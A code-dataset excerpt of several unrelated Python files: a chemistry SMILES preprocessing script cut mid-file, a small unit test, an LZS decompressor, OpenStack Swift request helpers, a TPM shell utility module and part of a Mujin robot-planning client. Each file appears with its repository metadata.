# Compute the descriptors with rdkit
# as defined in the fixed parameter file
desc_names = re.compile(FP.DESCRIPTORS['names'])
functions, names = hp_chem.get_rdkit_desc_functions(desc_names)
descriptors = hp_chem.rdkit_desc(data_rdkit, functions, names)
hp.save_obj(descriptors, f'{save_dir}desc')
# Compute fingerprints
fingerprint = hp_chem.fingerprint_calc(data_rdkit, verbose=verbose)
fp_dict = {'fingerprint': fingerprint}
hp.save_obj(fp_dict, f'{save_dir}fp')
# Extract Murcko and generic scaffolds
scaf, generic_scaf = hp_chem.extract_murcko_scaffolds(data_rdkit)
desc_scaf = {'scaffolds': scaf, 'generic_scaffolds': generic_scaf}
hp.save_obj(desc_scaf, f'{save_dir}scaf')
hp.write_in_file(f'{save_dir}generic_scaffolds.txt', generic_scaf)
hp.write_in_file(f'{save_dir}scaffolds.txt', scaf)
def draw_scaffolds(top_common, path):
"""
Function to draw scaffolds with rdkit.
Parameters:
- dict_scaf: dictionnary with scaffolds.
- top_common (int): how many of the most common
scaffolds to draw.
- path (string): Path to save the scaffolds picture
and to get the scaffolds data.
"""
path_scaffolds = f'{path}scaf'
data_ = hp.load_obj(path_scaffolds)
for name_data, data in data_.items():
# Note that some molecules are put as a list
# with a string error; we remove them for drawing
# Note 2: they occur very rarely
data = [x for x in data if type(x) is str]
counter = collections.Counter(data)
common = counter.most_common(top_common)
total = sum(counter.values())
mols = [Chem.MolFromSmiles(x[0]) for x in common[:top_common]]
repet = [str(x[1]) + f'({100*x[1]/total:.2f}%)' for x in common[:top_common]]
molsPerRow = 5
common_top = Draw.MolsToGridImage(mols,
molsPerRow=molsPerRow,
subImgSize=(150,150),
legends=repet)
common_top.save(f'{path}top_{top_common}_{name_data}.png')
def do_processing(split, data_path, augmentation, min_len, max_len, save_dir, verbose=True):
"""
Function to process a dataset.
Parameters:
- split (float): value used to split the dataset between
the training set and the validation set. E.g., if split is 0.8,
80% of the data will go in the training set, and 20% in the
validation set.
- data_path (string): path to the dataset.
- augmentation (int): value to augment the dataset. E.g., if augmentation
is 10, the SMILES enumeration will be done to add 10 different
SMILES encoding for each SMILES (i.e. resulting in a total of 11 representations)
for a given SMILES in the dataset.
- min_len (int): minimum length of SMILES to be kept in the dataset.
- max_len (int): maximum length of SMILES to be kept in the dataset.
- save_dir (string): directory to save the processed dataset.
"""
# load the data with right SMILES limits,
# both in a list and in rdkit mol format
data_ori, data_rdkit = load_data(data_path, min_len, max_len, verbose=verbose)
# we save the data without augmentation if it was
# not already saved. We will need it to check the novelty
# of the generated SMILES
if os.path.isfile(f'{save_dir}pruned.txt'):
hp.write_in_file(f'{save_dir}pruned.txt', data_ori)
if verbose: print('Start data analysis')
do_data_analysis(data_rdkit, FP.DESCRIPTORS['names'], save_dir)
# draw top scaffolds
if verbose: print('Start drawing scaffolds')
top_common = 20
draw_scaffolds(top_common, save_dir)
if verbose: print('Start data processing')
# define index for the tr-val split
# and shuffle them
all_idx = np.arange(len(data_ori))
idx_split = int(split*len(all_idx))
np.random.shuffle(all_idx)
# we need to be careful about the case where
# idx_split = 0 when there is only one
# SMILES in the data, e.g. for fine-tuning
if idx_split==0:
# in this case, we use the unique smile both
# for the training and validation
idx_tr_canon = [0]
idx_val_canon = [0]
else:
idx_tr_canon = all_idx[:idx_split]
idx_val_canon = all_idx[idx_split:]
assert len(idx_tr_canon)!=0
assert len(idx_val_canon)!=0
if verbose:
print(f'Size of the training set after split: {len(idx_tr_canon)}')
print(f'Size of the validation set after split: {len(idx_val_canon)}')
d = dict(enumerate(data_ori))
data_tr = [d.get(item) for item in idx_tr_canon]
data_val = [d.get(item) for item in idx_val_canon]
hp.write_in_file(f'{save_dir}data_tr.txt', data_tr)
hp.write_in_file(f'{save_dir}data_val.txt', data_val)
if augmentation>0:
if verbose:
print(f'Data augmentation {augmentation}-fold start')
# Augment separately the training and validation splits
# It's important to do those steps separetely in order
# to avoid to have the same molecule represented in
# both splits
tr_aug = augment_dataset(data_tr, augmentation, min_len, max_len, verbose=False)
val_aug = augment_dataset(data_val, augmentation, min_len, max_len, verbose=False)
# Merge with the original data and shuffle
full_training_set = list(set(data_tr + tr_aug))
shuffle(full_training_set)
full_validation_set = list(set(data_val + val_aug))
shuffle(full_validation_set)
full_datalist = full_training_set + full_validation_set
if verbose:
print(f'Size of the training set after agumentation: {len(full_training_set)}')
print(f'Size of the validation set after agumentation: {len(full_validation_set)}')
# Create the partitions for the data generators
# with the full augmented dataset
idx_tr = np.arange(len(full_training_set))
idx_val = np.arange(len(full_training_set), len(full_training_set) + len(full_validation_set))
# Save
hp.write_in_file(f'{save_dir}{save_name}.txt', full_datalist)
hp.save_obj(list(idx_tr), save_dir + 'idx_tr')
hp.save_obj(list(idx_val), save_dir + 'idx_val')
else:
# Save
hp.write_in_file(f'{save_dir}{save_name}.txt', data_ori)
hp.save_obj(list(idx_tr_canon), f'{save_dir}idx_tr')
hp.save_obj(list(idx_val_canon), f'{save_dir}idx_val')
if __name__ == '__main__':
start = time.time()
####################################
# get back parameters
args = vars(parser.parse_args())
verbose = args['verbose']
filename = args['filename']
name_data = filename.split('/')[-1].replace('.txt','')
config = configparser.ConfigParser()
config.read('parameters.ini')
# get back the experiment parameters
min_len = int(config['PROCESSING']['min_len'])
max_len = int(config['PROCESSING']['max_len'])
split = float(config['PROCESSING']['split'])
mode = config['EXPERIMENTS']['mode']
# check if experiment mode exists
if mode not in ['training', 'fine_tuning']:
raise ValueError('The mode you picked does not exist. Available: training and fine_tuning')
if verbose:
print('\nSTART PROCESSING')
print(f'Experiment mode: {mode}')
####################################
####################################
# define the path to the data files
# and process all the data we need
dir_data = 'results/data/'
for key in config['DATA']:
name = config['DATA'][key]
if name:
print(f'\nCurrent data being processed: {name}')
full_data_path = f'../data/{name}'
name = name.replace('.txt', '')
# define saving path
# experiment parameters depending on the mode
aug = int(config['AUGMENTATION'][key])
save_name = f'{min_len}_{max_len}_x{aug}'
save_dir = f'{dir_data}{name}/{save_name}/'
os.makedirs(save_dir, exist_ok=True)
# Check first if the training data was already done;
# if yes, we skip the processing.
if os.path.isfile(f'{save_dir}{save_name}.txt'):
print(f'Data {save_name} already exist in dir {name}; skipping processing.')
else:
do_processing(split, full_data_path, aug, min_len, max_len,
save_dir, verbose=verbose)
# and the fine-tuning data given as arg to te script
full_data_path = f'../data/{name_data}.txt'
aug = int(config['AUGMENTATION']['fine_tuning'])
save_name = f'{min_len}_{max_len}_x{aug}'
save_dir = f'{dir_data}{name_data}/{save_name}/'
os.makedirs(save_dir, exist_ok=True)
# Check first if the training data was already done;
# if yes, we skip the processing.
if os.path.isfile(f'{save_dir}{save_name}.txt'):
print(f'Data {save_name} already exist in dir {name}; skipping processing.')
else:
do_processing(split, full_data_path, aug, min_len, max_len,
save_dir, verbose=verbose)
end = time.time()
print(f'PROCESSING DONE in {end - start:.04} seconds')
####################################
| 37.75 | 105 | 0.633128 |
1763812f94632dfd9c931c11db77193963eb7c5b | 84 | py | Python | tests/Unit_Tests/decorator.py | Yayg/ripe | 8bb090ecb84bf45d3fc5bc008683ee84a74888ab | [
"MIT"
] | null | null | null | tests/Unit_Tests/decorator.py | Yayg/ripe | 8bb090ecb84bf45d3fc5bc008683ee84a74888ab | [
"MIT"
] | 1 | 2019-09-27T11:41:42.000Z | 2019-09-27T11:41:42.000Z | tests/Unit_Tests/decorator.py | Yayg/rift | 8bb090ecb84bf45d3fc5bc008683ee84a74888ab | [
"MIT"
] | null | null | null | import rift
@rift.Test
def test_decorator():
print("Passed")
rift.run_tests()
| 10.5 | 21 | 0.702381 |
4f326a25217703035c82058d8a84e9f550088334 | 3,451 | py | Python | rombuster/deps/lzs_decompress.py | EntySec/RomBuster | 01b053eb33fbf1aef5d68922803219af58bfa10f | [
"MIT"
] | 175 | 2021-05-18T19:56:42.000Z | 2022-03-30T04:35:21.000Z | rombuster/deps/lzs_decompress.py | lollipop31/RomBuster | c858279b59d3345375e9944dbf760a0d9d7b0796 | [
"MIT"
] | 1 | 2021-07-07T07:11:08.000Z | 2021-07-07T09:25:02.000Z | rombuster/deps/lzs_decompress.py | lollipop31/RomBuster | c858279b59d3345375e9944dbf760a0d9d7b0796 | [
"MIT"
] | 35 | 2021-05-19T19:08:02.000Z | 2022-03-25T17:33:28.000Z | #!/usr/bin/env python3
##############################################################
# Lempel-Ziv-Stac decompression
# BitReader and RingList classes
#
# Copyright (C) 2011 Filippo Valsorda - FiloSottile
# filosottile.wiki gmail.com - www.pytux.it
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################
import re
import random
import string
import collections
class BitReader:
def __init__(self, data_bytes):
self._bits = collections.deque()
for byte in data_bytes:
for n in range(8):
self._bits.append(bool((byte >> (7 - n)) & 1))
def getBit(self):
return self._bits.popleft()
def getBits(self, num):
res = 0
for i in range(num):
res += self.getBit() << num - 1 - i
return res
def getByte(self):
return self.getBits(8)
def __len__(self):
return len(self._bits)
class RingList:
def __init__(self, length):
self.__data__ = collections.deque()
self.__full__ = False
self.__max__ = length
def append(self, x):
if self.__full__:
self.__data__.popleft()
self.__data__.append(x)
if self.size() == self.__max__:
self.__full__ = True
def get(self):
return self.__data__
def size(self):
return len(self.__data__)
def maxsize(self):
return self.__max__
def __getitem__(self, n):
if n >= self.size():
return None
return self.__data__[n]
def LZSDecompress(data, window=RingList(2048)):
reader = BitReader(data)
result = ''
while True:
bit = reader.getBit()
if not bit:
char = reader.getByte()
result += chr(char)
window.append(char)
else:
bit = reader.getBit()
if bit:
offset = reader.getBits(7)
if offset == 0:
# EOF
break
else:
offset = reader.getBits(11)
lenField = reader.getBits(2)
if lenField < 3:
length = lenField + 2
else:
lenField <<= 2
lenField += reader.getBits(2)
if lenField < 15:
length = (lenField & 0x0f) + 5
else:
lenCounter = 0
lenField = reader.getBits(4)
while lenField == 15:
lenField = reader.getBits(4)
lenCounter += 1
length = 15 * lenCounter + 8 + lenField
for i in range(length):
char = window[-offset]
result += chr(char)
window.append(char)
return result, window
| 27.830645 | 77 | 0.534628 |
98a239e69ad267e9fa5826e6fbe08ca91ebf7a01 | 15,510 | py | Python | swift/common/request_helpers.py | tsg-/swift-ec | d5cc4d274696b587e820050774db4ca2c3d9c85c | [
"Apache-2.0"
] | null | null | null | swift/common/request_helpers.py | tsg-/swift-ec | d5cc4d274696b587e820050774db4ca2c3d9c85c | [
"Apache-2.0"
] | null | null | null | swift/common/request_helpers.py | tsg-/swift-ec | d5cc4d274696b587e820050774db4ca2c3d9c85c | [
"Apache-2.0"
] | null | null | null | # Copyright (c) 2010-2013 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
# implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Miscellaneous utility functions for use in generating responses.
Why not swift.common.utils, you ask? Because this way we can import things
from swob in here without creating circular imports.
"""
import hashlib
import sys
import time
from contextlib import contextmanager
from urllib import unquote
from swift.common.constraints import FORMAT2CONTENT_TYPE
from swift.common.exceptions import ListingIterError, SegmentError
from swift.common.http import is_success, HTTP_SERVICE_UNAVAILABLE
from swift.common.swob import HTTPBadRequest, HTTPNotAcceptable
from swift.common.utils import split_path, validate_device_partition
from swift.common.wsgi import make_subrequest
def get_param(req, name, default=None):
"""
Get parameters from an HTTP request ensuring proper handling UTF-8
encoding.
:param req: request object
:param name: parameter name
:param default: result to return if the parameter is not found
:returns: HTTP request parameter value
(as UTF-8 encoded str, not unicode object)
:raises: HTTPBadRequest if param not valid UTF-8 byte sequence
"""
value = req.params.get(name, default)
if value and not isinstance(value, unicode):
try:
value.decode('utf8') # Ensure UTF8ness
except UnicodeDecodeError:
raise HTTPBadRequest(
request=req, content_type='text/plain',
body='"%s" parameter not valid UTF-8' % name)
return value
def get_listing_content_type(req):
"""
Determine the content type to use for an account or container listing
response.
:param req: request object
:returns: content type as a string (e.g. text/plain, application/json)
:raises: HTTPNotAcceptable if the requested content type is not acceptable
:raises: HTTPBadRequest if the 'format' query param is provided and
not valid UTF-8
"""
query_format = get_param(req, 'format')
if query_format:
req.accept = FORMAT2CONTENT_TYPE.get(
query_format.lower(), FORMAT2CONTENT_TYPE['plain'])
out_content_type = req.accept.best_match(
['text/plain', 'application/json', 'application/xml', 'text/xml'])
if not out_content_type:
raise HTTPNotAcceptable(request=req)
return out_content_type
def split_and_validate_path(request, minsegs=1, maxsegs=None,
rest_with_last=False):
"""
Utility function to split and validate the request path.
:returns: result of split_path if everything's okay
:raises: HTTPBadRequest if something's not okay
"""
try:
segs = split_path(unquote(request.path),
minsegs, maxsegs, rest_with_last)
validate_device_partition(segs[0], segs[1])
return segs
except ValueError as err:
raise HTTPBadRequest(body=str(err), request=request,
content_type='text/plain')
def is_user_meta(server_type, key):
"""
Tests if a header key starts with and is longer than the user
metadata prefix for given server type.
:param server_type: type of backend server i.e. [account|container|object]
:param key: header key
:returns: True if the key satisfies the test, False otherwise
"""
if len(key) <= 8 + len(server_type):
return False
return key.lower().startswith(get_user_meta_prefix(server_type))
def is_sys_meta(server_type, key):
"""
Tests if a header key starts with and is longer than the system
metadata prefix for given server type.
:param server_type: type of backend server i.e. [account|container|object]
:param key: header key
:returns: True if the key satisfies the test, False otherwise
"""
if len(key) <= 11 + len(server_type):
return False
return key.lower().startswith(get_sys_meta_prefix(server_type))
def is_sys_or_user_meta(server_type, key):
"""
Tests if a header key starts with and is longer than the user or system
metadata prefix for given server type.
:param server_type: type of backend server i.e. [account|container|object]
:param key: header key
:returns: True if the key satisfies the test, False otherwise
"""
return is_user_meta(server_type, key) or is_sys_meta(server_type, key)
def strip_user_meta_prefix(server_type, key):
"""
Removes the user metadata prefix for a given server type from the start
of a header key.
:param server_type: type of backend server i.e. [account|container|object]
:param key: header key
:returns: stripped header key
"""
return key[len(get_user_meta_prefix(server_type)):]
def strip_sys_meta_prefix(server_type, key):
"""
Removes the system metadata prefix for a given server type from the start
of a header key.
:param server_type: type of backend server i.e. [account|container|object]
:param key: header key
:returns: stripped header key
"""
return key[len(get_sys_meta_prefix(server_type)):]
def get_user_meta_prefix(server_type):
"""
Returns the prefix for user metadata headers for given server type.
This prefix defines the namespace for headers that will be persisted
by backend servers.
:param server_type: type of backend server i.e. [account|container|object]
:returns: prefix string for server type's user metadata headers
"""
return 'x-%s-%s-' % (server_type.lower(), 'meta')
def get_sys_meta_prefix(server_type):
"""
Returns the prefix for system metadata headers for given server type.
This prefix defines the namespace for headers that will be persisted
by backend servers.
:param server_type: type of backend server i.e. [account|container|object]
:returns: prefix string for server type's system metadata headers
"""
return 'x-%s-%s-' % (server_type.lower(), 'sysmeta')
def remove_items(headers, condition):
"""
Removes items from a dict whose keys satisfy
the given condition.
:param headers: a dict of headers
:param condition: a function that will be passed the header key as a
single argument and should return True if the header
is to be removed.
:returns: a dict, possibly empty, of headers that have been removed
"""
removed = {}
keys = filter(condition, headers)
removed.update((key, headers.pop(key)) for key in keys)
return removed
def close_if_possible(maybe_closable):
close_method = getattr(maybe_closable, 'close', None)
if callable(close_method):
return close_method()
@contextmanager
def closing_if_possible(maybe_closable):
"""
Like contextlib.closing(), but doesn't crash if the object lacks a close()
method.
PEP 333 (WSGI) says: "If the iterable returned by the application has a
close() method, the server or gateway must call that method upon
completion of the current request[.]" This function makes that easier.
"""
yield maybe_closable
close_if_possible(maybe_closable)
class SegmentedIterable(object):
"""
Iterable that returns the object contents for a large object.
:param req: original request object
:param app: WSGI application from which segments will come
:param listing_iter: iterable yielding the object segments to fetch,
along with the byte subranges to fetch, in the
form of a tuple (object-path, first-byte, last-byte)
or (object-path, None, None) to fetch the whole thing.
:param max_get_time: maximum permitted duration of a GET request (seconds)
:param logger: logger object
:param swift_source: value of swift.source in subrequest environ
(just for logging)
:param ua_suffix: string to append to user-agent.
:param name: name of manifest (used in logging only)
:param response: optional response object for the response being sent
to the client.
"""
def __init__(self, req, app, listing_iter, max_get_time,
logger, ua_suffix, swift_source,
name='<not specified>', response=None):
self.req = req
self.app = app
self.listing_iter = listing_iter
self.max_get_time = max_get_time
self.logger = logger
self.ua_suffix = " " + ua_suffix
self.swift_source = swift_source
self.name = name
self.response = response
def app_iter_range(self, *a, **kw):
"""
swob.Response will only respond with a 206 status in certain cases; one
of those is if the body iterator responds to .app_iter_range().
However, this object (or really, its listing iter) is smart enough to
handle the range stuff internally, so we just no-op this out for swob.
"""
return self
def __iter__(self):
start_time = time.time()
have_yielded_data = False
if self.response and self.response.content_length:
bytes_left = int(self.response.content_length)
else:
bytes_left = None
try:
for seg_path, seg_etag, seg_size, first_byte, last_byte \
in self.listing_iter:
if time.time() - start_time > self.max_get_time:
raise SegmentError(
'ERROR: While processing manifest %s, '
'max LO GET time of %ds exceeded' %
(self.name, self.max_get_time))
# Make sure that the segment is a plain old object, not some
# flavor of large object, so that we can check its MD5.
path = seg_path + '?multipart-manifest=get'
seg_req = make_subrequest(
self.req.environ, path=path, method='GET',
headers={'x-auth-token': self.req.headers.get(
'x-auth-token')},
agent=('%(orig)s ' + self.ua_suffix),
swift_source=self.swift_source)
if first_byte is not None or last_byte is not None:
seg_req.headers['Range'] = "bytes=%s-%s" % (
# The 0 is to avoid having a range like "bytes=-10",
# which actually means the *last* 10 bytes.
'0' if first_byte is None else first_byte,
'' if last_byte is None else last_byte)
seg_resp = seg_req.get_response(self.app)
if not is_success(seg_resp.status_int):
close_if_possible(seg_resp.app_iter)
raise SegmentError(
'ERROR: While processing manifest %s, '
'got %d while retrieving %s' %
(self.name, seg_resp.status_int, seg_path))
elif ((seg_etag and (seg_resp.etag != seg_etag)) or
(seg_size and (seg_resp.content_length != seg_size) and
not seg_req.range)):
# The content-length check is for security reasons. Seems
# possible that an attacker could upload a >1mb object and
# then replace it with a much smaller object with same
# etag. Then create a big nested SLO that calls that
# object many times which would hammer our obj servers. If
# this is a range request, don't check content-length
# because it won't match.
close_if_possible(seg_resp.app_iter)
raise SegmentError(
'Object segment no longer valid: '
'%(path)s etag: %(r_etag)s != %(s_etag)s or '
'%(r_size)s != %(s_size)s.' %
{'path': seg_req.path, 'r_etag': seg_resp.etag,
'r_size': seg_resp.content_length,
's_etag': seg_etag,
's_size': seg_size})
seg_hash = hashlib.md5()
for chunk in seg_resp.app_iter:
seg_hash.update(chunk)
have_yielded_data = True
if bytes_left is None:
yield chunk
elif bytes_left >= len(chunk):
yield chunk
bytes_left -= len(chunk)
else:
yield chunk[:bytes_left]
bytes_left -= len(chunk)
close_if_possible(seg_resp.app_iter)
raise SegmentError(
'Too many bytes for %(name)s; truncating in '
'%(seg)s with %(left)d bytes left' %
{'name': self.name, 'seg': seg_req.path,
'left': bytes_left})
close_if_possible(seg_resp.app_iter)
if seg_resp.etag and seg_hash.hexdigest() != seg_resp.etag \
and first_byte is None and last_byte is None:
raise SegmentError(
"Bad MD5 checksum in %(name)s for %(seg)s: headers had"
" %(etag)s, but object MD5 was actually %(actual)s" %
{'seg': seg_req.path, 'etag': seg_resp.etag,
'name': self.name, 'actual': seg_hash.hexdigest()})
if bytes_left:
raise SegmentError(
'Not enough bytes for %s; closing connection' %
self.name)
except ListingIterError as err:
# I have to save this error because yielding the ' ' below clears
# the exception from the current stack frame.
excinfo = sys.exc_info()
self.logger.exception('ERROR: While processing manifest %s, %s',
self.name, err)
# Normally, exceptions before any data has been yielded will
# cause Eventlet to send a 5xx response. In this particular
# case of ListingIterError we don't want that and we'd rather
# just send the normal 2xx response and then hang up early
# since 5xx codes are often used to judge Service Level
# Agreements and this ListingIterError indicates the user has
# created an invalid condition.
if not have_yielded_data:
yield ' '
raise excinfo
except SegmentError as err:
self.logger.exception(err)
# This doesn't actually change the response status (we're too
# late for that), but this does make it to the logs.
if self.response:
self.response.status = HTTP_SERVICE_UNAVAILABLE
raise
| 40.285714 | 79 | 0.616054 |
7d64e9ec9259adac6d3b5ff021579b52164a7aff | 3,569 | py | Python | Python_TPM20_GUI/shell_util.py | RaymWong/optiga-tpm-explorer | 9a05849205784c4540f22d757f521092c86f2135 | [
"MIT"
] | 1 | 2022-02-09T20:46:05.000Z | 2022-02-09T20:46:05.000Z | Python_TPM20_GUI/shell_util.py | RaymWong/optiga-tpm-explorer | 9a05849205784c4540f22d757f521092c86f2135 | [
"MIT"
] | null | null | null | Python_TPM20_GUI/shell_util.py | RaymWong/optiga-tpm-explorer | 9a05849205784c4540f22d757f521092c86f2135 | [
"MIT"
] | 1 | 2022-02-15T02:36:28.000Z | 2022-02-15T02:36:28.000Z | import subprocess
import os
from subprocess import PIPE
# Variables to hold the 3 authorisation values
ownerAuth = "owner123"
nvAuth = "nv123"
endorseAuth = "endorsement123"
lockoutAuth = "lockout123"
openssl_cnf=("openssl_conf = openssl_init\n"
"[openssl_init]\n"
"engines = engine_section\n"
"[engine_section]\n"
"tpm2tss = tpm2tss_section\n"
"[tpm2tss_section]\n"
"engine_id = tpm2tss\n"
#~ "dynamic_path = /usr/lib/arm-linux-gnueabihf/engines-1.1/libtpm2tss.so\n"
"default_algorithms = ALL\n"
"init = 1\n"
"SET_OWNERAUTH = %s\n"
"[req]\n"
"distinguished_name = subject\n"
"[subject]\n" % ownerAuth)
def convertInputToHex(input_str, req_length):
converted_output = ""
# convert input to hex
# L has to be stripped due to some weird python convention
# [2:] as the first two are the hex prefix, 0x
try:
converted_output += ((hex(int(input_str, 16)))[2:]).strip("L")
except ValueError:
return 0
# if input is still too short, pad with zeroes
# if too long, truncate to appropriate length
diff_length = req_length - len(converted_output)
if (diff_length > 0):
while (diff_length > 0):
converted_output += "0"
diff_length -= 1
return converted_output[:req_length]
def checkDir():
workingDir = "./working_space/"
if not os.path.exists(workingDir):
os.makedirs(workingDir)
os.chdir(workingDir)
return
# Executes the supplied shell script on the command line
def execShellScript(fullpath):
output = ""
try:
print(input)
output = subprocess.check_output([sh, str(fullpath)], stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
output = e.output
print("ERROR")
print(output.decode())
return(output.decode())
# Executes a command on the command line
def execTpmToolsAndCheck(cmd, allowFail=True):
output = ""
try:
print((">>> ", " ".join(cmd)))
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
output = e.output
print(("{0} returned {1}".format(cmd[0], e.returncode)))
if ("error" in str(output).lower()) or ("fail" in str(output).lower()):
if not allowFail:
print(("ERROR in {0}".format(cmd[0])))
print((str(output)))
exit()
print((str(output.decode())))
return(output.decode())
# Executes the supplied command parameters with OpenSSL
def execCLI(cmd):
output = ""
try:
print((">>> ", " ".join(cmd)))
output = subprocess.check_output(cmd, stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
output = e.output
print("ERROR")
print(output.decode())
return(output.decode())
def createProcess(cmd, file):
output = ""
try:
output = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE,stdin=subprocess.PIPE,stderr=subprocess.STDOUT)
except subprocess.CalledProcessError as e:
output = e.output
print("ERROR")
print(output)
return(output)
def createProcess_PIPE(cmd, file):
output = ""
try:
output = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
except subprocess.CalledProcessError as e:
output = e.output
print("ERROR")
print(output)
return(output)
| 29.495868 | 121 | 0.616419 |
6fc5217341a4c28d1668a1beb07116bc2c540356 | 7,664 | py | Python | python/mujincontrollerclient/realtimeitlplanningclient.py | mqcmd196/mujincontrollerclientpy | 6f26143d7c64407c913561edafd3f459a2909900 | [
"Apache-2.0"
] | null | null | null | python/mujincontrollerclient/realtimeitlplanningclient.py | mqcmd196/mujincontrollerclientpy | 6f26143d7c64407c913561edafd3f459a2909900 | [
"Apache-2.0"
] | null | null | null | python/mujincontrollerclient/realtimeitlplanningclient.py | mqcmd196/mujincontrollerclientpy | 6f26143d7c64407c913561edafd3f459a2909900 | [
"Apache-2.0"
] | null | null | null | # -*- coding: utf-8 -*-
# Copyright (C) 2013-2015 MUJIN Inc.
# Mujin controller client for bin picking task
# mujin imports
from . import realtimerobotclient
# logging
import logging
log = logging.getLogger(__name__)
class RealtimeITLPlanningControllerClient(realtimerobotclient.RealtimeRobotControllerClient):
"""mujin controller client for realtimeitlplanning task
"""
def __init__(self, **kwargs):
"""logs into the mujin controller, initializes realtimeitlplanning task, and sets up parameters
:param controllerurl: url of the mujin controller, e.g. http://controller13
:param controllerusername: username of the mujin controller, e.g. testuser
:param controllerpassword: password of the mujin controller
:param taskzmqport: port of the realtimeitlplanning task's zmq server, e.g. 7110
:param taskheartbeatport: port of the realtimeitlplanning task's zmq server's heartbeat publisher, e.g. 7111
:param taskheartbeattimeout: seconds until reinitializing realtimeitlplanning task's zmq server if no hearbeat is received, e.g. 7
:param scenepk: pk of the bin picking task scene, e.g. komatsu_ntc.mujin.dae
:param robotname: name of the robot, e.g. VP-5243I
:param robotspeed: speed of the robot, e.g. 0.4
:param regionname: name of the bin, e.g. container1
:param targetname: name of the target, e.g. plasticnut-center
:param toolname: name of the manipulator, e.g. 2BaseZ
:param envclearance: environment clearance in milimeter, e.g. 20
:param usewebapi: whether to use webapi for controller commands
:param robotaccelmult: optional multiplier for forcing the acceleration
"""
super(RealtimeITLPlanningControllerClient, self).__init__(tasktype='realtimeitlplanning', **kwargs)
def SetJointValues(self, jointvalues, robotname=None, timeout=10, usewebapi=True, **kwargs):
taskparameters = {
'command': 'SetJointValues',
'jointvalues': jointvalues,
}
taskparameters.update(kwargs)
return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout, usewebapi=usewebapi)
def GetITLState(self, robotname=None, timeout=10, usewebapi=True, fireandforget=False, **kwargs):
taskparameters = {'command': 'GetITLState'}
taskparameters.update(kwargs)
return self.ExecuteCommand(taskparameters, robotname=robotname, timeout=timeout, usewebapi=usewebapi, fireandforget=fireandforget)
def MoveToCommand(self, program, commandindex=0, envclearance=15, robotspeed=None, robotaccelmult=None, usewebapi=True, timeout=10, fireandforget=False):
taskparameters = {
'command': 'MoveToCommand',
'program': program,
'commandindex': commandindex,
'envclearance': envclearance,
}
if robotspeed is not None:
taskparameters['robotspeed'] = robotspeed
if robotaccelmult is not None:
taskparameters['robotaccelmult'] = robotaccelmult
return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)
def ExecuteTrajectory(self, identifier, trajectories, statevalues=None, stepping=False, istep=None, cycles=1, restorevalues=None, envclearance=15, robotspeed=None, robotaccelmult=None, usewebapi=True, timeout=10, fireandforget=False):
taskparameters = {
'command': 'ExecuteTrajectory',
'identifier': identifier,
'trajectories': trajectories,
'statevalues': statevalues,
'stepping': stepping,
'envclearance': envclearance,
'cycles': cycles,
}
if istep is not None:
taskparameters['istep'] = istep
if restorevalues is not None:
taskparameters['restorevalues'] = restorevalues
if robotspeed is not None:
taskparameters['robotspeed'] = robotspeed
if robotaccelmult is not None:
taskparameters['robotaccelmult'] = robotaccelmult
return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)
def ExecuteTrajectoryStep(self, reverse=False, envclearance=15, robotspeed=None, robotaccelmult=None, usewebapi=True, timeout=10, fireandforget=False):
taskparameters = {
'command': 'ExecuteTrajectoryStep',
'reverse': reverse,
}
if robotspeed is not None:
taskparameters['robotspeed'] = robotspeed
if robotaccelmult is not None:
taskparameters['robotaccelmult'] = robotaccelmult
return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)
def CancelExecuteTrajectoryStep(self, envclearance=15, robotspeed=None, robotaccelmult=None, usewebapi=True, timeout=10, fireandforget=False):
taskparameters = {'command': 'CancelExecuteTrajectoryStep'}
if robotspeed is not None:
taskparameters['robotspeed'] = robotspeed
if robotaccelmult is not None:
taskparameters['robotaccelmult'] = robotaccelmult
return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)
def SetPauseExecuteTrajectory(self, envclearance=15, robotspeed=None, robotaccelmult=None, usewebapi=True, timeout=10, fireandforget=False):
taskparameters = {'command': 'SetPauseExecuteTrajectory'}
if robotspeed is not None:
taskparameters['robotspeed'] = robotspeed
if robotaccelmult is not None:
taskparameters['robotaccelmult'] = robotaccelmult
return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)
def ResumeExecuteTrajectory(self, envclearance=15, robotspeed=None, robotaccelmult=None, usewebapi=True, timeout=10, fireandforget=False):
taskparameters = {'command': 'ResumeExecuteTrajectory'}
if robotspeed is not None:
taskparameters['robotspeed'] = robotspeed
if robotaccelmult is not None:
taskparameters['robotaccelmult'] = robotaccelmult
return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)
def ComputeRobotConfigsForCommandVisualization(self, program, commandindex=0, usewebapi=True, timeout=2, fireandforget=False, **kwargs):
taskparameters = {
'command': 'ComputeRobotConfigsForCommandVisualization',
'program': program,
'commandindex': commandindex,
}
taskparameters.update(kwargs)
return self.ExecuteCommand(taskparameters, usewebapi=usewebapi, timeout=timeout, fireandforget=fireandforget)
def ComputeRobotJointValuesForCommandVisualization(self, program, commandindex=0, usewebapi=True, timeout=2, fireandforget=False, **kwargs):
taskparameters = {
